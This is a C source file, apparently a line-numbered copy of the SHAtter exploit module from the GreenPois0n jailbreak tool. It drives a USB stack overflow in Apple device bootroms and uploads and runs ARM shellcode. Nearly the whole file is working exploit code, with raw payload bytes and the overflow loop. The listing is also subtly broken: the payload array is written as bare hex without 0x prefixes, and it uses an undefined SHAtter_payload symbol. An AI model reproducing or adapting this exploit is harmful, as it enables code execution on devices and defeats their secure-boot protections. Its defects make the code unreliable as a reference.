/** * GreenPois0n Syringe - exploits/SHAtter/SHAtter.c * Copyright (C) 2010

1. /**
2. * GreenPois0n Syringe - exploits/SHAtter/SHAtter.c
3. * Copyright (C) 2010 Chronic-Dev Team
4. * Copyright (C) 2010 Joshua Hill
5. *
6. * Based on exploit discovered by pod2g
7. *
8. * This program is free software: you can redistribute it and/or modify
9. * it under the terms of the GNU General Public License as published by
10. * the Free Software Foundation, either version 3 of the License, or
11. * (at your option) any later version.
12. *
13. * This program is distributed in the hope that it will be useful,
14. * but WITHOUT ANY WARRANTY; without even the implied warranty of
15. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16. * GNU General Public License for more details.
17. *
18. * You should have received a copy of the GNU General Public License
19. * along with this program. If not, see <http://www.gnu.org/licenses/>.
20. **/
21.  
22. #include <stdio.h>
23. #include <string.h>
24. #include <stdlib.h>
25.  
26. #include "common.h"
27. #include "exploits.h"
28. #include "SHAtter.h"
29. #include "libirecovery.h"
30.  
31. int SHAtter_exploit() {
32. irecv_error_t error = IRECV_E_SUCCESS;
33. int i, ret;
34. unsigned char data[0x800];
35. unsigned char payload[] = {
36. 08 E0 C0 46 C0 46 C0 46 C0 46 C0 46 C0 46 C0 46 C0 46 C0 46 08 48 00 21 08 4A 00 F0 05 F8 06 48 07 49 00 22 07 4B 98 47 0B 78 03 70 01 30 01 31 01 3A 00 2A F8 D1 70 47 00 00 00 84 00 00 01 00 00 40 02 00 EF 07 00 00
37. };
38.  
39. info("Executing SHAtter exploit ...\n");
40. debug("Reseting usb counters.\n");
41. ret = irecv_control_transfer(client, 0x21, 4, 0, 0, 0, 0, 1000);
42. if (ret < 0) {
43. error("Failed to reset usb counters.\n");
44. return -1;
45. }
46.  
47. debug("executing stack overflow\n");
48. unsigned int stack_address = 0x84033F98;
49. for(i = 0; i < 0x23800 ; i+=0x800) {
50. ret = irecv_control_transfer(client, 0x21, 1, 0, 0, data, 0x800, 1000);
51. if (ret < 0) {
52. error("Failed to push data to the device.\n");
53. return -1;
54. }
55. }
56. debug("Uploading shellcode.\n");
57. memset(data, 0, 0x800);
58. memcpy(data, SHAtter_payload, sizeof(SHAtter_payload));
59. ret = irecv_control_transfer(client, 0x21, 1, 0, 0, data, 0x800, 1000);
60. if (ret < 0) {
61. error("Failed to upload shellcode.\n");
62. return -1;
63. }
64.  
65. debug("Reseting usb counters.\n");
66. ret = irecv_control_transfer(client, 0x21, 4, 0, 0, 0, 0, 1000);
67. if (ret < 0) {
68. error("Failed to reset usb counters.\n");
69. return -1;
70. }
71.  
72. int send_size = 0x100 + sizeof(payload);
73. *((unsigned int*) &payload[0x14]) = send_size;
74. memset(data, 0, 0x800);
75. memcpy(&data[0x100], payload, sizeof(payload));
76.  
77. ret = irecv_control_transfer(client, 0x21, 1, 0, 0, data, send_size , 1000);
78. if (ret < 0) {
79. error("Failed to send SHAtter to the device.\n");
80. return -1;
81. }
82. ret = irecv_control_transfer(client, 0xA1, 1, 0, 0, data, send_size , 1000);
83. if (ret < 0) {
84. error("Failed to execute SHAtter.\n");
85. return -1;
86. }
87. info("SHAtter sent & executed successfully.\n");
88.  
89. debug("Reconnecting to device\n");
90. client = irecv_reconnect(client, 2);
91. if (client == NULL) {
92. debug("%s\n", irecv_strerror(error));
93. error("Unable to reconnect\n");
94. return -1;
95. }
96.  
97. return 0;
98. }